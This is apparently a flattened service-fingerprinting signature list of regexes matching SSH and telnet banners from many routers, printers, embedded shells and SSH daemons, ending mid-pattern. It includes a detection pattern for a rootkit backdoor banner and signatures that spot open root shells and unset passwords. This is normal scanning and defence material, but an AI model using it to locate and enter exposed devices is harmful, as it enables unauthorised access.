FreeBSD-openssh-portable-overwrite-base +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n +SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n +SSH-([\d.]+)-Nortel\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n +\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v +SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n +SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 +SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 +SSH-([\d.]+)-Sun_SSH_(\S+) +SSH-([\d.]+)-meow roototkt by rebel +SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n +SSH-(\d[\d.]*)-(Server-V)\r?\n +SSH-(\d[\d.]*)-(Server-VI)\r?\n +SSH-(\d[\d.]*)-(Server-VII)\r?\n +SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n +\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n +SSH-2\.0-0\.0 \r?\n +SSH-([\d.]+)-([\w.]+) VShell\r?\n +SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n +SSH-1\.5-X\r?\n +Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n +SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-cryptlib\r?\n +SSH-2\.0-1\.0 Radware SSH \r?\n +SSH-2\.0-(\d{8,12})\r?\n +SSH-2\.0-Twisted\r?\n +SSH-2\.0-PGP\r?\n +SSH-([\d.]+)-libssh-([-\w.]+)\r?\n +SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n +SSH-([\d.]+)-VRP-([\d.]+)\r?\n +SSH-([\d.]+)-lancom\r?\n +SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd +SSH-([\d.]+)-AOS_SSH\r?\n +SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n +SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n +SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n +SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n +SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd +SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n +SSH-([\d.]+)-([\w.]+)rad\r?\n +SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n +SSH-1\.5-SSH\.0\.1\r?\n +SSH-([\d.]+)-Ingrian_SSH\r?\n +SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n +SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n +SSH-([\d.]+)-Zyxel SSH server\r?\n +SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n +SSH-2\.0-SSH_0\.2\r?\n +SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n +SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n +Could not load host key\. Closing connection\.\.\. +SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n +SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n +SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! +SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n +SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n +SSH-([\d.]+)-1\.00\r\n +SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n +SSH-([\d.]+)-ROSSSH\r\n +SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n +SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n +SSH-([\d.]+)-XXXX\r\n +SSH-([\d.]+)-xxx\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n +SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n +SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n +SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n +Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n +unknown command \r\nunknown command \r\n +\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n +RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n +\0\0\0\x0bSynergy\0\x01\0 +\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n +You are not welcome to use (\w+) from [\w._-]+\.\n +welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f +\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: +\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> +\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: +\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: +220 SL4NT viewer service ready\r\n250 Currently connected channels: +\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ +\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n +\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: +\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r +\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: +login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\r\npassword: +\xff\xfb\x01\xff\xfd\x18\xff\xfd# +\xff\xfb\x03\xff\xfb\x01\r\nPassword: +\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n +Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: +\xff\xfb\x01\xff\xfb\x03\r\nUsername: +\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 +\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n +\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: +\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP +\xff\xfe%\xff\xfd\x18 +\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +\r\nRaptor Firewall Secure Gateway\.\r\n +\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b +\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* \*\x1b\[2;1H +\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r +Check Point FireWall-1 authenticated Telnet server running on +\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> +\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: +\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) +\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) +\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb +Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes +\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 +\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: +\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n +\xff\xfd\x18 +\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ +\xff\xfb\x01\n\rUser Name : +\xff\xfd\ +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd +\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> +\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) +\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: +\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: +\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: +\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd +\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: +\xff\xfd\(| p|IBM OS/390 or SNA telnetd +\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\r\nVxWorks login: \xff\xfb\x01 +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: +\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 +\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n +PC Telnetd ([\d.]+)\r\n\r\nlogin: +rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: +USR5450 Telnet server v([\d.]+)\n\r\nPassword : +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> +\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n +\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n +\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> +\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n +\xff\xfb\x01\n?\r\n\r?VxWorks login: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: +\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd +\xff\xfb\x03\xff\xfb\x01password: +\r\n\xff\xfb\x01Enter password: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: +\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: +login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: +220 FTP server \(ver 1\.0\) ready\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: +\r\nSystem unavailable\. Please try later\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: +\xff\xfb\x01\xff\xfe\"\r\n\* +\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n +\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b +Telnet server disabled\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: +\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) +\r\n.*Based on CircleMUD ([\w._-]+),\r\n +\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b +\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b +\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r +\r\nSorry, this system is engaged\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: +\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: +\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: +\xff\xfb\x01\r\nD-Link Access Point login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: +\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# +\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) +\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H +\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} +\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* 